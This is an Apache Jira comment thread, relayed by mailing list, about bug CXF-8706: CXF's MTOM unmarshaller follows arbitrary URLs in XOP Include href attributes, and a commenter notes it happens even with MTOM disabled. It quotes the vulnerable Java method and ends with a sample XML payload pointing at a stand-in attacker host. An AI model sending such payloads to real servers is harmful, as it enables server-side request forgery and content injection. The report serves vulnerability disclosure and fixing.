You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@cxf.apache.org by "Stefan Berger (Jira)" <ji...@apache.org> on 2022/12/19 12:36:00 UTC

[jira] [Commented] (CXF-8706) CXF MTOM handler allow content injection

    [ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649304#comment-17649304 ] 

Stefan Berger commented on CXF-8706:
------------------------------------

I don't think this is limited to MTOM enabled only.

I can send MTOM requests to my server with an Endpoint where {{SOAPBinding.isMTOMEnabled()}} returns false.

Is it possible that {{.isMTOMEnabled() == false}} is ignored on the server side? Debugging breakpoints aren't triggered. Neither on startup, nor when an MTOM request is received.

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, Unmarshaller allows XOP Include tag to have href attributes that allow any protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else {// should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>  
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)